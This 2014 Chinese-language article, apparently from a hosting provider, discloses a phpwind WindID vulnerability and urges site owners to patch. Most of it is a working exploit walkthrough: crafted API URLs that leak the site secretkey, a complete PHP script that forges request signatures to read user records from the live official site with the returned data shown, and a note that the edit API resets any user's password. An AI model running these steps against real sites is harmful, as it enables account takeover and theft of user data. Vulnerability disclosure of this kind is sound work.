新聞中心
PHPWIND可拿shell的高危漏洞修補(bǔ)
作者 / 無(wú)憂主機(jī) 時(shí)間 2014-09-04 14:03:52
近期phpwind爆了一個(gè)高危漏洞,下面無(wú)憂主機(jī)小編跟大家說(shuō)說(shuō)下這個(gè)漏洞的問題。借鑒的國(guó)內(nèi)漏洞網(wǎng)站測(cè)試的結(jié)果。 首先在src/applications/windidserver/api/controller/AppController.php內(nèi)代碼:
public function listAction() { $result = $this->_getAppDs()->getList(); $this->output($result); }如何獲取可以訪問接口的key? 查看用戶上傳頭像頁(yè)面就可以知道了: /phpwind/src/windid/service/user/srv/WindidUserService.php 內(nèi)的代碼:
$key = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'flash'), array('uid'=>'undefined'));去頭像頁(yè)面查看一下源文件 http://localhost/phpwind/index.php?m=profile&c=avatar&_left=avatar [caption id="attachment_16305" align="alignnone" width="300"] phpwind代碼截圖[/caption] 解出urldecode得: http://localhost/phpwind/windid/index.php?m=api&c=avatar&a=doAvatar&uid=1&windidkey=f5b35f56c88695b9069e18ecaafad874&time=1408197299&clientid=1&type=flash&avatar=http://localhost/phpwind/windid/attachment/avatar/000/00/00/1.jpg?r=88418 去掉 &avatar=http://localhost/phpwind/windid/attachment/avatar/000/00/00/1.jpg?r=88418 然后記得,還需要POST一個(gè)uid等于undefined 把doAvatar換成list,avatar換成app得: http://localhost/phpwind/windid/index.php?m=api&c=app&a=list&uid=1&windidkey=f5b35f56c88695b9069e18ecaafad874&time=1408197299&clientid=1&type=flash POST:uid=undefined 得: {"1":{"id":"1","name":"phpwind9.0","siteurl":"http:\/\/localhost\/phpwind","siteip":"","secretkey":"73e3dcdd733c7c3733c17273a624e162","apifile":"windid.php","charset":"gbk","issyn":"1","isnotify":"1"}} [caption id="attachment_16306" align="alignnone" width="300"] phpwind問題情況截圖[/caption] 拿到這個(gè)key,我可以做的事情太多了,用戶體系內(nèi)的所有事情我都可以做了。 在官網(wǎng)測(cè)試了一下,拿到key后測(cè)試一下讀取一個(gè)用戶的資料:
<?php $secretkey = '308c6c43a*****279dd61dd80e8d59bd'; $c = 'user'; $a = 'get'; $data = array('uid'=>'658925'); $time = time(); $key = appKey('1', time(), $secretkey, array('userid'=>658925), $data); echo post('http://www.phpwind.net/windid/index.php?m=api&c='.$c.'&a='.$a.'&windidkey='.$key.'&time='.$time .'&clientid=1&userid=658925',$data); function post($uri,$data) { $ch = curl_init (); curl_setopt ( $ch, CURLOPT_URL, $uri ); curl_setopt ( $ch, CURLOPT_POST, 1 ); curl_setopt ( $ch, CURLOPT_HEADER, 0 ); curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data ); $return = curl_exec ( $ch ); curl_close ( $ch ); return $return; } function appKey($apiId, $time, $secretkey, $get, $post) { $array = array('m', 'c', 'a', 'windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token', 'Filename', 'Upload', 'token'); $str = ''; ksort($get); ksort($post); foreach ($get AS $k=>$v) { if (in_array($k, $array)) continue; $str .=$k.$v; } foreach ($post AS $k=>$v) { if (in_array($k, $array)) continue; $str .=$k.$v; } return md5(md5($apiId.'||'.$secretkey).$time.$str); } ?>[caption id="attachment_16307" align="alignnone" width="300"] phpwind問題代碼截圖[/caption] {"uid":"658925","username":"phpwind","email":"fengyu@phpwind.net","safecv":"5b4111de","regdate":"1143101940","regip":""} 在User的api內(nèi)還有一個(gè)edit的接口,可以修改任意用戶的密碼,調(diào)用它,不填寫old_password,將可以修改任意用戶的密碼,不會(huì)驗(yàn)證原密碼的。 這整個(gè)過程就是phpwind的漏洞被利用的過程,現(xiàn)在官方已經(jīng)有了補(bǔ)丁,希望看到這篇文章的站長(zhǎng)們盡快打上最新的補(bǔ)丁吧。 無(wú)憂主機(jī)相關(guān)文章推薦閱讀: PHPWIND如何更換域名解決方法 PHPWIND快速發(fā)帖時(shí)的問題解決 PHPWIND改名后可以重復(fù)投票問題 PHPWIND提示“安全驗(yàn)證參數(shù)校驗(yàn)失敗,無(wú)法完成充值”
本文地址:http://www.gle-technology.com/phpwind/16300.html